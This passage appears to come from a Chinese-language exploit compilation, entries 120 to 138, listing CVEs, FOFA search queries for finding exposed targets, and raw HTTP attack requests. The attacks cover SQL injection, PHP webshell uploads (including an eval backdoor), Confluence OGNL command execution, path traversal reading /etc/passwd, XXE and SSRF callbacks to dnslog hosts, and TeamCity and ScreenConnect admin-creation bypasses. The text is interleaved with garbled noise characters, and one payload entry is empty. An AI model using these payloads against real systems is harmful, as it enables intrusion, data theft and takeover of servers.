5 C% _4 q; f' D' v8 X" O4 p+ ySec-Fetch-Dest: empty0 C/ w( @) {# f9 C, R0 O) u' B% x1 h
Sec-Fetch-Mode: cors
; \ |, P' b2 ]! m# cSec-Fetch-Site: same-origin
& Y0 O* j4 y# sX-Forwarded-For: 1.1.1.1) [1 A9 ]4 W: b f+ Y
X-Originating-Ip: 1.1.1.1
1 p2 ], |8 L1 Z F4 Y5 F- sX-Remote-Ip: 1.1.1.15 }. `4 m6 @6 O4 Y
X-Remote-Addr: 1.1.1.16 b/ n0 V8 a) ~' I! x
Te: trailers
3 U8 }# d9 D9 X! C! y+ l, z- Z, A$ ^Connection: close
# @* W% G6 V; o+ [1 W( {/ p" w0 W8 @- b( i) i# X, w6 X* ^- H( ^+ z
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456, s3 E9 n& x" c( u+ H
S+ q% T; I+ B$ s* m# d
" Z! T( p# q7 E3 l: F1 w
120. 北京百绰智能S40管理平台导入web.php任意文件上传
3 y* z0 ]* V( O' n1 x6 C! UCVE-2024-1253
6 N3 I$ L5 C, M. A: RFOFA:title="Smart管理平台"
4 L% u H$ ^- O" k! IPOST /useratte/web.php? HTTP/1.1
3 T1 h# x9 \( c* WHost: ip:port2 Y# ?3 n2 C) e6 n! i8 T
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db5 a2 \" N7 ]( c* S
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko3 B7 k4 y7 G; U- z* d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ L4 t: }( D+ p5 i# L$ }1 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% {6 L6 C1 l4 e2 _9 K2 D! y: ?
Accept-Encoding: gzip, deflate8 N" t% r6 i9 P+ H5 s/ [
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328. C( @1 t: s! E/ T% h4 W1 a* N4 T
Content-Length: 597
" a- M7 H7 ~3 o5 rOrigin: https://ip:port5 z. r. ?- `, X) g9 M. O* ]
Referer: https://ip:port/sysmanage/licence.php
6 U% M/ [. `3 nUpgrade-Insecure-Requests: 1
* p& C) @5 N1 Y0 n2 nSec-Fetch-Dest: document. S# b. ^( ^2 X. t K
Sec-Fetch-Mode: navigate, ?$ }( |% Q4 [
Sec-Fetch-Site: same-origin3 `, G8 b( ?* o, t3 ^" g8 @4 `$ f
Sec-Fetch-User: ?1
0 r) q6 y* P; `5 n) Y3 d* W; y' XTe: trailers
' E' V: x( |" jConnection: close
7 O2 U3 _+ J8 }9 K! `1 D" H k4 B5 J4 r% P3 k& Z6 }
-----------------------------42328904123665875270630079328
& g5 i3 E, l( t, K z4 `" }+ yContent-Disposition: form-data; name="file_upload"; filename="2.php"
/ g5 Y7 H+ ]+ I( W7 O& p* n. hContent-Type: application/octet-stream0 v2 q4 d8 Z% ~) a/ T r% E
+ L5 g* [8 N; U0 E& T<?php phpinfo()?>
/ m& y7 P- L4 d5 z* q2 J* {; L-----------------------------42328904123665875270630079328. }9 H! g" W# j1 \( v
Content-Disposition: form-data; name="id_type"8 Y9 G; k4 L" d: |1 B0 v
r8 m S. r! o9 E1+ l9 _: S% Q% |; r5 E9 @- s l
-----------------------------423289041236658752706300793286 v0 N, a0 h! N! G3 m5 O9 O( Z; |0 P8 J
Content-Disposition: form-data; name="1_ck"
% Y; ~) d* D! Q m4 v
9 J; L- u7 Y: O: {! u1 l1_radhttp
/ C1 k2 R; Q- `) c6 z-----------------------------423289041236658752706300793282 \( W+ |# y: H# R" T0 C1 l
Content-Disposition: form-data; name="mode"/ s) l. v- ]0 V q! q* o
% a, e( W7 G$ {8 g! c+ {; d; H; @0 Wimport& x6 C( L, D& j# D6 ]4 w# q3 J9 ~. x
-----------------------------42328904123665875270630079328# U. L+ t" Z7 J8 ]8 q, R
' L# R5 H& Z' G+ Z
8 Z* ]& [) g7 E6 q4 u" |, |
文件路径/upload/2.php
5 X. ^3 Z$ o$ |, {2 s9 P: u9 u" k- u# }5 x' e. U
121. 北京百绰智能S42管理平台userattestation.php任意文件上传9 ^9 f0 m$ Z- \6 `0 x K" Z2 p
CVE-2024-1918
% e% ?2 o* o& vFOFA:title="Smart管理平台"' u" W3 Y1 i) E
POST /useratte/userattestation.php HTTP/1.1
: s4 a7 a K& K w6 pHost: 192.168.40.130:8443# I% R- E# b$ E3 @9 k8 M, X
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
8 m0 ~) C2 x; i- r' c x/ u. UUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko& p3 V% L# A! ~3 B F# a/ n! g) I1 R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 L n0 {; }2 V( X9 a+ y( U) {6 g0 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 g+ |7 u" m; R/ ^* kAccept-Encoding: gzip, deflate
5 u$ o. k% x& I# S: E# rContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328+ S, P R8 _* T; R+ N6 h
Content-Length: 592! \8 `- o3 H% p1 v6 Y
Origin: https://192.168.40.130:8443
; m" E' Y6 M) _& BUpgrade-Insecure-Requests: 1, @% d4 D& q+ i; o0 ]% A* A& _- n! Z
Sec-Fetch-Dest: document
1 ]0 [6 f$ ?6 e: f) c- a5 KSec-Fetch-Mode: navigate: a6 i& X1 s3 M' t0 I; t2 Y
Sec-Fetch-Site: same-origin
7 F3 d) b. Y L- VSec-Fetch-User: ?1
6 Q$ \3 F, P& Q# N+ {Te: trailers
4 [$ E, }# B1 d) HConnection: close5 Z( j5 l) G1 B4 ^( ]. W! Z" J
0 s0 u: n$ h* N. P5 {7 G9 k0 u-----------------------------42328904123665875270630079328
+ N- ], _8 i- |8 C" u6 @Content-Disposition: form-data; name="web_img"; filename="1.php"
! V/ f ~; E0 ?: ]1 }Content-Type: application/octet-stream y2 q- R6 Q0 M
4 M3 ^8 v) P8 A0 Q' c- ~) P
<?php phpinfo();?>4 j+ V |7 d& y' e" Y
-----------------------------42328904123665875270630079328) ?" R$ X& h4 @2 @( ~
Content-Disposition: form-data; name="id_type", v' w0 F; j* |9 f
- {* P _* k6 m p1, M" g) _$ a- b' H' C
-----------------------------42328904123665875270630079328& k8 f6 s7 [' g% _- O& X* b
Content-Disposition: form-data; name="1_ck"
6 z* g* u: [& r" w' _& c8 J, K6 _* H
1_radhttp t* W |; t" |
-----------------------------42328904123665875270630079328
' k' T4 [) u* j* [/ n4 r9 fContent-Disposition: form-data; name="hidwel"* _0 |( U+ C* F! A9 h, e
- c7 p2 |9 _% v8 y8 pset
6 R5 r9 d" V+ K-----------------------------42328904123665875270630079328
; ~7 U& y' H! w9 @, F1 ~! r" H' I5 @
# H3 B- ]! G7 P3 z5 ~: h& S+ S6 ~' w& L9 A1 x" c5 _0 [+ E
boot/web/upload/weblogo/1.php
1 g+ {- A9 C* ^5 n; ^) s
" X. R/ N( S+ K122. 北京百绰智能s200管理平台/importexport.php sql注入- ^4 P3 _, i7 p. ^
CVE-2024-27718FOFA:title="Smart管理平台"
( X( w, T8 b! z2 W4 \6 C4 d其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
( n3 e1 ]% J P8 }7 MGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
l2 a4 o7 g( o' Z9 ]: e# FHost: x.x.x.x6 _/ m2 n7 B5 L" {4 Q' [
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc04 H% _ O, V3 w- v# v {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
8 l& D* \8 c. D$ a, A( eAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# w$ n H4 i" n' LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" U8 V9 \2 j% ^2 c
Accept-Encoding: gzip, deflate, br
( x# [0 j8 p* S' D, x- |6 EUpgrade-Insecure-Requests: 16 d9 j! L- x- E+ y( B
Sec-Fetch-Dest: document
( `# H8 O p* ^% u: X% oSec-Fetch-Mode: navigate
8 ^) O4 @- L+ G0 R+ XSec-Fetch-Site: none0 v$ [' H9 ^& L; u) {
Sec-Fetch-User: ?17 n; r+ d# v$ n
Te: trailers
) x+ `. y W' M( P, {* sConnection: close" Y) p! }/ q6 ` S' I0 j- L+ T
9 ^ t( G7 f# |' G6 m7 `+ Z( S; _; v" B/ |( C8 i: Q8 R
123. Atlassian Confluence 模板注入代码执行3 Z3 B- i8 W- f! _
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"! E3 r1 a, p, I: d3 ?4 @* b
POST /template/aui/text-inline.vm HTTP/1.1
+ M1 N/ U' A- c* Q+ YHost: localhost:8090$ z" P: N* _+ u: G
Accept-Encoding: gzip, deflate, br/ ^! N7 {; R( E( b# @. P7 H
Accept: */*
' P5 r% p/ L# W& P) e4 S/ h. EAccept-Language: en-US;q=0.9,en;q=0.8" t9 L8 C3 P0 L1 W. K8 }3 S) R' [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.368 g/ g2 d3 K# ]
Connection: close- N; a2 J3 K, @
Content-Type: application/x-www-form-urlencoded
8 b+ E! e3 Z9 q8 n3 Z/ ?! Q0 f+ Q8 u
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
" \2 E" B) O; n" Y/ z9 P
# ^% I/ h ~! {$ u/ C2 k$ E" S: w% y$ B
124. 湖南建研工程质量检测系统任意文件上传! \7 \7 ^. B: B1 e7 b: w! \
FOFA:body="/Content/Theme/Standard/webSite/login.css"1 p0 M$ W( G$ y$ J6 I7 r
POST /Scripts/admintool?type=updatefile HTTP/1.11 }1 U9 [/ k* z9 a* m
Host: 192.168.40.130:8282
, s6 G6 e+ d- x! S; YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36% g/ L# [5 `( e* r* m! H( }# i ~
Content-Length: 72
2 `) U7 s6 m4 i/ L1 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8: \9 q. `# D2 ^; X/ f
Accept-Encoding: gzip, deflate, br8 q+ t) W: t t. b) ?9 z* ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 b4 u+ o, z, E& \$ d2 u
Connection: close2 ]9 u* D0 y: M0 L, e( R
Content-Type: application/x-www-form-urlencoded
5 \9 u0 i1 }) u/ }
! z4 t1 q# x( p! x0 Z0 JfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
7 S* B- B" m( n( z) M+ z% w. y+ n) Q, B( L, K
2 w/ w' b3 }; k3 k7 phttp://192.168.40.130:8282/Scripts/abcgcg.aspx
% t l6 M/ |% G) \' |; T
3 }" s% r2 v$ B2 `6 z8 A125. ConnectWise ScreenConnect身份验证绕过
" q! u8 v2 ?& X& ^CVE-2024-1709
9 |+ Z+ F( f5 Y( I. g% C/ N- U) }$ oFOFA:icon_hash="-82958153") D' }" U% i/ P7 Z% d8 ]
https://github.com/watchtowrlabs ... bypass-add-user-poc' s/ R' ?) J: w& d1 ~8 U; J
$ U- P4 H4 ^( S" r6 x. D$ J7 d) s* M
# J/ d1 n' B+ z, \8 w6 r; o( Z3 ]
使用方法
$ |3 \/ e# ^9 h3 v( K. Z7 ^8 vpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!8 l7 W0 g b5 w
1 d" K4 @5 D$ z# ?5 |& @4 L3 {
$ {( b& w) {3 a1 L4 q6 B4 C
创建好用户后直接登录后台,可以执行系统命令。
% H2 J2 C. ]' x& K) K- P! R
# r1 U6 X$ a# w z) l P126. Aiohttp 路径遍历
3 s g. F" g# y# E3 T( i7 |; ^8 IFOFA:title=="ComfyUI"4 M; U$ S* I8 ]' j' n2 {: u. B
GET /static/../../../../../etc/passwd HTTP/1.17 g" M# J* K0 K8 a1 S4 v5 u1 [
Host: x.x.x.x' z* B3 G5 x) O' p1 Z' O4 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36& @% M7 g$ l' W+ Y5 O* a# }
Connection: close
1 D+ e, G5 ^3 VAccept: */*
# U1 p* b& r! v4 @; f6 C1 ~- _; RAccept-Language: en! _* y0 K1 y3 l3 c
Accept-Encoding: gzip' C% ?) _8 j7 ?- P; q7 a; h
: K {+ j/ {3 p" m% v2 ^
, x3 V, }- z3 h a1 T127. 广联达Linkworks DataExchange.ashx XXE; S: L6 p7 f6 ^# [' k
FOFA:body="Services/Identification/login.ashx" ) G. }) ^. ?6 C* Z) X6 g! k% Z
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1* H* W# |# |$ Q6 z p7 g, V
Host: 192.168.40.130:8888
, N5 i& {9 w# j F. C; w2 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36$ \$ M, Z B* {$ b# ?
Content-Length: 415
' _2 H" c* d7 q; h0 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 ~" |! i; z& N4 a0 b! t$ sAccept-Encoding: gzip, deflate
7 o1 m9 u; q/ s$ W5 j+ JAccept-Language: zh-CN,zh;q=0.9
7 f) R) x# T5 V8 SConnection: close
% r4 R/ l9 n2 [Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe06 D; t/ e3 p, U3 W% I4 U+ R! v
Purpose: prefetch
1 _, ]2 {" Y+ [$ o$ oSec-Purpose: prefetch;prerender+ F- J2 O9 G2 r
- N7 x3 ]/ o2 [+ \) E------WebKitFormBoundaryJGgV5l5ta05yAIe0
) A+ X) ]$ j: |8 h" R' zContent-Disposition: form-data;name="SystemName"
& }! _& L4 }. I: U
9 C! o# Q$ l9 hBIM
2 ]' R# j7 H7 g7 @1 j# O------WebKitFormBoundaryJGgV5l5ta05yAIe0- K( Q7 e3 ]' Q0 @
Content-Disposition: form-data;name="Params"0 E5 y8 |: t! U" @0 ~% b
Content-Type: text/plain& Y" a5 v9 w7 \; c
5 Y+ N6 ?& |$ _/ w) G8 ?6 f3 u<?xml version="1.0" encoding="UTF-8"?> d/ o; f; K8 A; S" }1 d
<!DOCTYPE test [
& _3 C" L- o0 L" r<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">. }& H9 l( n% |7 \
]8 g1 V# z# P, J+ W E9 j1 z
>
/ J' c( U1 c8 f/ r( v9 |6 k<test>&t;</test>
1 d! y# U& @) E8 p& ^3 [) l------WebKitFormBoundaryJGgV5l5ta05yAIe0--9 T: f( ]5 s8 Y/ B/ M2 T
# w% D. _6 ~, ?% x v2 j
. T6 `0 C2 G' W8 m& s9 o9 Q4 f( { F4 _' u" E# z8 p
128. Adobe ColdFusion 反序列化
& P; b- T! ]" L& c/ hCVE-2023-38203
( u, K6 Q6 j5 bAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)) O. L/ ^( _7 q
FOFA:app="Adobe-ColdFusion"
5 R+ Q8 F8 u: y7 T; q) ]PAYLOAD: X w) w( s4 c/ n/ c5 M. B
+ B6 |' I7 E. q5 q! Z5 E129. Adobe ColdFusion 任意文件读取 C( V+ c9 w/ L" C* z+ d
CVE-2024-20767, x% H: {5 G/ E, T
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
% `% S* } h2 ^5 |" O$ m第一步,获取uuid) c S9 d: }2 A+ P# e
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1/ z% U# q2 J/ _
Host: x.x.x.x
7 U/ E# W; v7 g ]8 D: f' zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, ?6 T) n7 x! pAccept: */*
& L3 Z& i4 d3 H) \( H. t" P9 tAccept-Encoding: gzip, deflate5 g! V+ I' w: t4 n# M+ \
Connection: close
' \6 [2 m% C! S! j% D# o0 o+ g7 Z& @, p3 T
; B6 z7 F, f- N5 G$ o& y第二步,读取/etc/passwd文件
" f3 D$ k) B' _9 X: k1 P e; wGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
# h0 g/ ?, r+ Z/ {+ f% Q* [Host: x.x.x.x
4 m3 r0 F: b/ X5 [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
$ e# g' p& d0 L# g4 n( w5 PAccept: */** \8 F" p% Q- o1 }5 G: d
Accept-Encoding: gzip, deflate. `) p4 s m" y+ s
Connection: close
# j; F8 H* j! n% c" puuid: 85f60018-a654-4410-a783-f81cbd5000b9! E/ I) p& a2 @" @, w: t
4 r# Y; F( ?# G/ y! W
* g& X1 G/ q+ x* l6 |130. Laykefu客服系统任意文件上传
5 T& O' O/ w! z# zFOFA:icon_hash="-334624619"
7 z! N' u% i, U0 d# nPOST /admin/users/upavatar.html HTTP/1.1
3 o- k. |3 X# f; ?! aHost: 127.0.0.1* B; Q7 S8 n M. s7 J
Accept: application/json, text/javascript, */*; q=0.01
2 n; w% N' k; a! e/ ^6 Q6 qX-Requested-With: XMLHttpRequest
# ~1 q: N6 t: N) y' V4 C4 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
( C+ N/ i" Q: G/ S# YContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR0 @: {0 r3 P* a' R _" U; f' D
Accept-Encoding: gzip, deflate
* g8 m4 F$ J# T: q( i& YAccept-Language: zh-CN,zh;q=0.9
- u3 q2 x3 |' P& L+ |: ]Cookie: user_name=1; user_id=34 S0 k$ _% A0 d8 I d5 B* I
Connection: close' O+ e' b; P: ~: e0 v! J
' T0 ^! \4 O2 Q4 X! z& V
------WebKitFormBoundary3OCVBiwBVsNuB2kR4 T+ L9 L4 F3 R# H8 Y& `9 G z0 R
Content-Disposition: form-data; name="file"; filename="1.php"2 O: j- ~+ h- p4 v, B( z7 f
Content-Type: image/png# X5 s, p; f4 @4 @4 j" ?
( g9 o2 r. D' b
<?php phpinfo();@eval($_POST['sec']);?>- a3 d0 ~/ z% c6 E' v$ }
------WebKitFormBoundary3OCVBiwBVsNuB2kR--% Q8 v4 X6 y% A1 t( J+ t. q5 D
, j& J5 ~% o% u" Z' G: {
/ [3 N9 `- ~+ ^% E+ x0 C& f& k+ c6 c131. Mini-Tmall <=20231017 SQL注入
( O7 m2 n! C" N2 ~FOFA:icon_hash="-2087517259"
/ P8 D0 H; y& h- w! S" H x后台地址:http://localhost:8080/tmall/admin
# _1 e# M q' Q" c* Uhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)- K: N0 p Y9 f$ j6 \* N
6 x ?( m6 X8 o' D$ O* W |7 k
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过, f6 G. Y$ }* L0 H3 _6 g! h
CVE-2024-27198* U9 c( ?2 T) m- n6 `# N7 P5 v
FOFA:body="Log in to TeamCity"* N" `+ Z8 U, O" C6 Z
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
: v& T. H5 ?3 QHost: 192.168.40.130:8111+ |; a7 I7 E3 @, r' K( \. j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- _. {5 l" s& ? b% g. g1 p, D) ~6 QAccept: */*. E. `; E; w3 `
Content-Type: application/json& C9 X9 R6 b. u8 v6 I! V' c
Accept-Encoding: gzip, deflate
Q( N4 u5 z0 ]/ j' _& r, s% I$ f( M
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
% V& N6 `; O# d7 }
/ q2 t) y" L0 [, v9 F/ h+ u) Q+ N
CVE-2024-27199
! K% {2 c1 H8 F( w( W# g/ F p4 @/res/../admin/diagnostic.jsp
. r$ r4 i+ l( s, {/.well-known/acme-challenge/../../admin/diagnostic.jsp) n! F! c5 g& I# j0 M" q
/update/../admin/diagnostic.jsp- Q. [+ D n8 L6 ^. a4 `
7 V: }. j: _ n4 T6 g
: k% ? z! j3 {7 Z+ m7 E8 _CVE-2024-27198-RCE.py
* s4 F9 l- Z, g2 ^# E H6 M5 h3 R" n4 W" D! K) G
133. H5 云商城 file.php 文件上传+ r9 l/ v" o" ?9 M D C
FOFA:body="/public/qbsp.php"' @+ `1 ?8 q0 g# E+ p1 \. z
POST /admin/commodtiy/file.php?upload=1 HTTP/1.12 k: a* X" i+ o s6 q
Host: your-ip
B" o! U6 }# U7 i) z3 R/ Q% ~1 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 w+ V' R5 S2 z }6 ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx6 j$ W! E2 A6 G9 E
' g% }7 ^. f0 E0 K# ?------WebKitFormBoundaryFQqYtrIWb8iBxUCx& R" R" Q5 T. [! t, l$ A8 x) n
Content-Disposition: form-data; name="file"; filename="rce.php"
8 n9 [$ j5 q- w# U: Y3 D, H* fContent-Type: application/octet-stream
' n _- L$ I) G+ F' G) [
2 h, a2 y& \+ g+ Y m<?php system("cat /etc/passwd");unlink(__FILE__);?> {6 r9 m5 P& p" ?2 e) ?( k
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--6 q/ u) `! l! L! L7 K9 Z! v3 s6 B
' H6 P( O2 R+ l- }* ~
0 T# ^+ A( R L. a. @# r: U- O2 D6 j9 u+ z9 z* I! S
134. 网康NS-ASG应用安全网关index.php sql注入
& g+ f4 N: |* n7 h, nCVE-2024-2330 z# d( C- B" E% ?6 S
Netentsec NS-ASG Application Security Gateway 6.3版本
( n4 R2 w- t7 }9 mFOFA:app="网康科技-NS-ASG安全网关"
2 S- N; L% Y6 q* S$ p( a% R( MPOST /protocol/index.php HTTP/1.1, x6 `& U- U% j' w2 l% V. T
Host: x.x.x.x* m5 v3 ` R9 M% N7 R+ p0 E
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
; x& X* `2 X0 m4 H- ^8 ]% ]% vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.03 h2 A6 D8 d0 u+ T0 R. Y
Accept: */*& F+ d( }2 {& ^. W( I6 H G8 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& M, G: w# y9 D
Accept-Encoding: gzip, deflate% x9 @/ m/ |2 R
Sec-Fetch-Dest: empty: i" w+ u9 o$ ]
Sec-Fetch-Mode: cors
2 }& ]; Q1 h. i3 LSec-Fetch-Site: same-origin
- X \+ G4 h' [0 L ~2 iTe: trailers
: X& O0 D; u: yConnection: close+ }) g9 q/ z. ]6 L K
Content-Type: application/x-www-form-urlencoded6 d( N. G) |. C) Z4 z
Content-Length: 263
7 Q, {0 i6 c( H% S0 n9 D* Z( |& @5 U& X# l" ?6 y% K
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}+ {6 G6 I5 g, V
: T' Y2 z7 r* y0 q0 A/ h
' N% v R( n0 M& Q
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
( ^; m) q% q i# fCVE-2024-2022
! M0 U* }9 O! r7 w" B3 z4 NNetentsec NS-ASG Application Security Gateway 6.3版本3 b8 F* J! L% v8 v. d) W6 `
FOFA:app="网康科技-NS-ASG安全网关"
, z* B5 q: @" k2 m6 V+ w9 e$ d& N& eGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.17 e1 X% H2 V! z3 o
Host: x.x.x.x8 n* Q$ u s; m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 s4 h( n! n0 j$ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 @) J" [) E: A) i: a; XAccept-Encoding: gzip, deflate" ^; _3 T" i+ m+ a8 ?
Accept-Language: zh-CN,zh;q=0.9
u, J* F: I3 mConnection: close# A! q' W4 {. h, i: F$ `* E' B% [
& o4 x8 r/ N; D8 l9 s
9 j: P! e8 L% X136. NextChat cors SSRF! g3 J/ H4 U ^. }8 D( s. {! U2 _
CVE-2023-497851 `; W& A t/ j8 z* R; w8 R
FOFA:title="NextChat"
* Q) @) b5 M t6 |GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
8 q$ b. {3 a* V8 ?. D# xHost: x.x.x.x:10000
0 p1 `& M1 n1 g! UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- x0 Y$ L7 \7 t7 x- X+ C2 a& W
Connection: close/ H9 Z( r7 V: Q# ]4 w5 ^/ T' m
Accept: */*
8 n0 b8 M1 K3 u. E; }; @% e% dAccept-Language: en
3 _) t6 d9 u' _Accept-Encoding: gzip
2 |& b6 N4 K3 Q! g5 R
( r9 \" u5 p) i
9 C9 i7 G& D' A( _+ z3 B137. 福建科立迅通信指挥调度平台down_file.php sql注入
% f+ J# [% X0 }5 |4 l! W# v* BCVE-2024-2620
0 p2 b- F! i: q( c. ^, VFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
. c' m+ W4 ?6 ~, e: Q6 h+ Z) [6 `GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
) A9 A+ L9 V- s6 {* M2 NHost: x.x.x.x
2 G! x& D* y. i- P `1 f: R9 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 u% |2 g. B3 Z( p1 O. E4 f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ Q; `5 N2 u1 o0 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 ~- U2 Q. ?$ [ [; a, ], M8 bAccept-Encoding: gzip, deflate, br+ N8 s/ y1 `) x! `! }) @+ |
Connection: close9 t* M, H X4 N/ d9 Q3 ?4 | }6 A
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj2 O$ [) i; u A9 l
Upgrade-Insecure-Requests: 1, f+ Z0 D3 V9 i6 R9 F7 X% V4 b
2 X: d( w. d) g& T
) n: l0 c W. }- ] }3 H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
$ r; M0 s2 I& O' ZCVE-2024-2621
" }& o# V# N$ x8 b% g) _2 p8 CFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 d( D0 ~ Z3 S" Y( u U* M' V
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1, }$ W2 u( I6 e) o* L7 g
Host: x.x.x.x
: X8 I5 s6 M' X+ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* L4 p' N. W/ e! ?
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! j2 E0 P0 l7 ?5 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
